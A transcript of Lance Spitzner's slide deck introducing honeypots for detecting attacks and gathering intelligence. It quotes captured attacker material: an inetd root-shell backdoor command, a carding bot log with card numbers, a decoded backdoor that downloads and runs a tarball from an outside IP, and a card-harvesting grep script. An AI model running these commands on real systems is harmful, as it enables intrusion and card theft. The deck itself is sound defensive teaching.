Presentation is loading. Please wait.

Presentation is loading. Please wait.

Honeypots - An Overview By Lance Spitzner. Your Speaker  President, Honeypot Technologies Inc.  Founder, Honeynet Project & Moderator, honeypot mailing.

Published byAugustine Young Modified over 9 years ago

Similar presentations

Presentation on theme: "Honeypots - An Overview By Lance Spitzner. Your Speaker  President, Honeypot Technologies Inc.  Founder, Honeynet Project & Moderator, honeypot mailing."— Presentation transcript:

1 Honeypots - An Overview By Lance Spitzner

2 Your Speaker  President, Honeypot Technologies Inc.  Founder, Honeynet Project & Moderator, honeypot mailing list  Author, Honeypots: Tracking Hackers & Co- author, Know Your Enemy  Officer, Rapid Deployment Force  Worked with CIA, NSA, FBI, DOJ, President’s Advisory Board, Army, Navy

3 Purpose Overview of honeypots.

4 Agenda  The Problem  Honeypots

5 The Problem

6 The Attacker

7 Initiative Your network is a static target. The bad guys can strike whenever they want, wherever they want. They have the initiative. :jack :hehe come with yure ip i`ll add u to the new 40 bots :jack :i owned and trojaned 40 servers of linux in 3 hours :jack ::))))) :jill :heh :jill :damn :jack :heh :jill :107 bots :jack :yup

8 Tool Use :_pen :do u have the syntax for sadmind exploit :D1ck :lol :D1ck :yes :_pen :what is it :D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p] :_pen : what do i do for -c :D1ck :heh :D1ck :u dont know? :_pen :no :D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"

9 Anyone a target

10 Tools Getting Better 1 | Caldera eDesktop|OpenLinux 2.3 update[wu-ftpd-2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm]

11 Not out for fun J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting

12 Criminal Activity 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (4407070000588951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)

13 Honeypots

14 Initiative Honeypots allow you to take the initiative, they turn the tables on the bad guys.

15 Honeypots A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.

16 The Concept  System has no production value, no authorized activity.  Any interaction with the honeypot is most likely malicious in intent.

17 Flexible Tool Honeypots do not solve a specific problem. Instead, they are a highly flexible tool with different applications to security.

18 Advantages  Collect small data sets of high value, simple to analyze and manage.  Vastly reduce false positives.  Catch new attacks.  Work in encrypted or IPv6 environments.  Minimal resources.

19 Disadvantages  Limited scope of view  Risk

20 Types of Honeypots  Low-interaction  High-interaction Interaction measures the amount of activity an attacker can have with a honeypot.

21 Low-Interaction  Emulates services and operating systems.  Easy to deploy, minimal risk  Captures limited information  Examples include Honeyd, Specter, KFSensor

22 High-interaction  Provide real operating systems and services, no emulation.  Complex to deploy, greater risk.  Capture extensive information.  Examples include ManTrap and Honeynets.

23 Primary value of honeypots  Detection  Information Gathering

24 Honeypots: Detection

25 Detection  Problem: Most detection technologies generate thousands of alerts a day, most of which are false positives. Which do you focus on, and how?  Low-interaction honeypots are used primarily for detection.

26 Detection - Honeypots  Collect very small data sets of high value.  Vastly reduce false positives (if not eliminating them).  Catch new attacks (false negatives).  Work in encrypted and IPv6 environments.  Deployed primarily on internal networks.

27 Example - Honeyd honeypot  OpenSource honeypot developed by Niels Provos.  Production honeypot.  Emulates services and operating systems.

28 How Honeyd works  Monitors unused IP space.  When it sees connection attempt, assumes IP and interacts with attacks.  Can monitor literally millions of IP addresses at the same time.

29 Network with unused IPs

30 Honeyd monitoring unused IPs

31 Emulated FTP Server case $incmd_nocase in QUIT* ) echo -e "221 Goodbye.\r" exit 0;; SYST* ) echo -e "215 UNIX Type: L8\r" ;; HELP* ) echo -e "214-The following commands are recognized (* =>'s unimplemented).\r" echo -e " USER PORT STOR MSAM* RNTO NLST MKD CDUP\r" echo -e " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP\r" echo -e " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOU\r" echo -e " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE\r" echo -e " REIN* MODE MSND* REST XCWD HELP PWD MDTM\r" echo -e " QUIT RETR MSOM* RNFR LIST NOOP XPWD\r" echo -e "214 Direct comments to ftp@$domain.\r" ;; USER* )

32 Advanced Features  Tarpitting  Spam RBL  Passive Fingerprinting  Dynamic Honeypots

33 Bottom Line - Cost Effective  Detect any unauthorized activity on unused IP addresses.  Man hours reduced with small data sets and reduced false positives.  Hardware and Software, $1,000

34 Honeypots: Information

35 Intelligence Gathering  Problem: Sometimes detection is not enough.  High-interaction honeypots are uniquely qualified to capture extensive amounts of information.

36 Honeypots Honeypots collect small data sets, as such they can easily capture detailed information, to include every packet and its full payload.

37 Honeynets  Not a product, but an architecture.  An entire network of systems designed to be compromised.  Deployed on both external and internal networks.

38 GenII Honeynet

39 Snort-inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)

40 02/19-04:34:10.529350 206.123.208.5 -> 172.16.183.2 PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen:422 02 00 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48...5.7.=.8..6..H D3 5D D9 62 EF 6B A2 F4 2B AE 3E C3 52 89 CD 57.].b.k..+.>.R..W DD 69 F2 6C E8 1F 8E 29 B4 3B 8C D2 18 61 A9 F6.i.l...).;...a.. 3B 84 CF 18 5D A5 EC 36 7B C4 15 64 B3 02 4B 91 ;...]..6{..d..K. 0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C 02 88 CD 58...Q..#.2..|...X D6 67 9E F0 27 A1 1C 53 99 24 A8 2F 66 B8 EF 7A.g..'..S.$./f..z F2 7B B2 F6 85 12 A3 20 57 D4 5A E0 25 B0 2E BF.{..... W.Z.%... F6 48 7F C4 0A 95 20 AA 26 AF 3C B8 EF 41 78 01.H.....&.<..Ax. 85 BC 00 89 06 3D BA 40 C6 0B 96 14 A5 DC 67 F2.....=.@......g. 7C F8 81 0E 8A DC F3 0A 21 38 4F 66 7D 94 AB C2 |.......!8Of}... D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B 32....5Lcz.......2 49 60 77 8E A5 BC D3 EA 01 18 2F 46 5D 74 8B A2 I`w......./F]t.. B9 D0 E7 FE 15 2C 43 5A 71 88 9F B6 CD E4 FB 12.....,CZq....... 29 40 57 6E 85 9C B3 CA E1 F8 0F 26 3D 54 6B 82 )@Wn.......&=Tk. New Tactics - Backdoor

41 starting decode of packet size 420 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 D3 5D local buf of size 420 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73..killall -9 tts 65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75 erve ; lynx -sou 72 63 65 20 68 74 74 70 3A 2F 2F 31 39 32 2E 31 rce http://192.1 36 38 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F 68.103.2:8882/fo 6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F 2E 74 67 7A o > /tmp/foo.tgz 20 3B 20 63 64 20 2F 74 6D 70 20 3B 20 74 61 72 ; cd /tmp ; tar 20 2D 78 76 7A 66 20 66 6F 6F 2E 74 67 7A 20 3B -xvzf foo.tgz ; 20 2E 2F 74 74 73 65 72 76 65 20 3B 20 72 6D 20./ttserve ; rm 2D 72 66 20 66 6F 6F 2E 74 67 7A 20 74 74 73 65 -rf foo.tgz ttse 72 76 65 3B 00 00 00 00 00 00 00 00 00 00 00 00 rve;............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00................ Backdoor Decoded

42 Motives #!/bin/sh echo " Caut carti de credit si incerc sa salvez in card.log" touch /dev/ida/.inet/card.log egrep -ir 'mastercard|visa' /home|egrep -v cache >>card.log egrep -ir 'mastercard|visa' /var|egrep -v cache >>card.log egrep -ir 'mastercard|visa' /root|egrep -v cache >>card.log if [ -d /www ]; then egrep -ir 'mastercard|visa' /www >>card.log fi

43 Bottom Line - Information Can collect indepth data no other technology can.

44 Summary  Honeypots are not a solution, they are a flexible tool with different applications to security.  Primary value in detection and information gathering.  Just the beginning for honeypots.

45 ?

46 Resources  Honeypot website  www.tracking-hackers.com  Honeypots maillist  www.securityfocus.com/popups/forums/honeypots/faq.html

47 Resources - Books  Know Your Enemy  www.honeynet.org/book/  Honeypots: Tracking Hackers  www.tracking-hackers.com/book/

48 http://www.honeypots.com Lance Spitzner

Download ppt "Honeypots - An Overview By Lance Spitzner. Your Speaker  President, Honeypot Technologies Inc.  Founder, Honeynet Project & Moderator, honeypot mailing."

Similar presentations

Honeynet Introduction Tang Chin Hooi APAN Secretariat.

Honeynet Introduction Tang Chin Hooi APAN Secretariat.
Uzair Masood 100111089 MASYU001.  What is a honey Pot ? “ A honey pot is an information system resource whose value lies in unauthorized or illicit use.

Uzair Masood MASYU001.  What is a honey Pot ? “ A honey pot is an information system resource whose value lies in unauthorized or illicit use.
HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.

HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.
Honeypot Research Hung Nguyen Brendan Roberts Comp 4027 Forensic and Analytical Computing.

Honeypot Research Hung Nguyen Brendan Roberts Comp 4027 Forensic and Analytical Computing.
Chris Brunsman Senior Investigator Retriever Payment Systems 281-376-3399 x1183

Chris Brunsman Senior Investigator Retriever Payment Systems x1183
Honeypot 서울과학기술대학교 Jeilyn Molina 121336101. Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.

Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.

Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.
Honeypots and Honeynets Source: The HoneyNet Project Book: Know Your Enemy (2 nd ed) Presented by: Mohammad.

Honeypots and Honeynets Source: The HoneyNet Project Book: Know Your Enemy (2 nd ed) Presented by: Mohammad.
Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.

Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.
Use of Honey-pots to Detect Exploited Systems Across Large Enterprise Networks Ashish Gupta Network Security May 2004

Use of Honey-pots to Detect Exploited Systems Across Large Enterprise Networks Ashish Gupta Network Security May 2004
Honeynet/Honeypot Project - Leslie Cherian - Todd Deshane - Patty Jablonski - Creighton Long May 2, 2006.

Honeynet/Honeypot Project - Leslie Cherian - Todd Deshane - Patty Jablonski - Creighton Long May 2, 2006.
Intrusion Prevention System DYNAMIC HONEYNET by Rosenfeld Asaf advisor Uritzky Max.

Intrusion Prevention System DYNAMIC HONEYNET by Rosenfeld Asaf advisor Uritzky Max.
Honeynets and The Honeynet Project. 2 Speaker 3 Purpose To explain our organization, our value to you, and our research.

Honeynets and The Honeynet Project. 2 Speaker 3 Purpose To explain our organization, our value to you, and our research.
1 The Honeynet Project: Trapping the Hackers Lance Spitzner, Sun Microsystems Presented by Vikrant Karan.

1 The Honeynet Project: Trapping the Hackers Lance Spitzner, Sun Microsystems Presented by Vikrant Karan.
Lecture 11 Intrusion Detection (cont)

Lecture 11 Intrusion Detection (cont)
The Honeynet Project. Your Speakers The Team Members.

The Honeynet Project. Your Speakers The Team Members.
1 Introduction to Honeypot, Denial-of- Service, and Rootkit Cliff C. Zou CAP6135 Spring, 2011.

1 Introduction to Honeypot, Denial-of- Service, and Rootkit Cliff C. Zou CAP6135 Spring, 2011.
Www.cuispa.org Fraudulent Site Take Down Guidance Author: John Brozycki, CISSP Hudson Valley FCU CUISPA Member Advisor LEGAL DISCLAIMER: This document.

Fraudulent Site Take Down Guidance Author: John Brozycki, CISSP Hudson Valley FCU CUISPA Member Advisor LEGAL DISCLAIMER: This document.
PROJECT IN COMPUTER SECURITY MONITORING BOTNETS FROM WITHIN FINAL PRESENTATION – SPRING 2012 Students: Shir Degani, Yuval Degani Supervisor: Amichai Shulman.

PROJECT IN COMPUTER SECURITY MONITORING BOTNETS FROM WITHIN FINAL PRESENTATION – SPRING 2012 Students: Shir Degani, Yuval Degani Supervisor: Amichai Shulman.
China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

Similar presentations

Ads by Google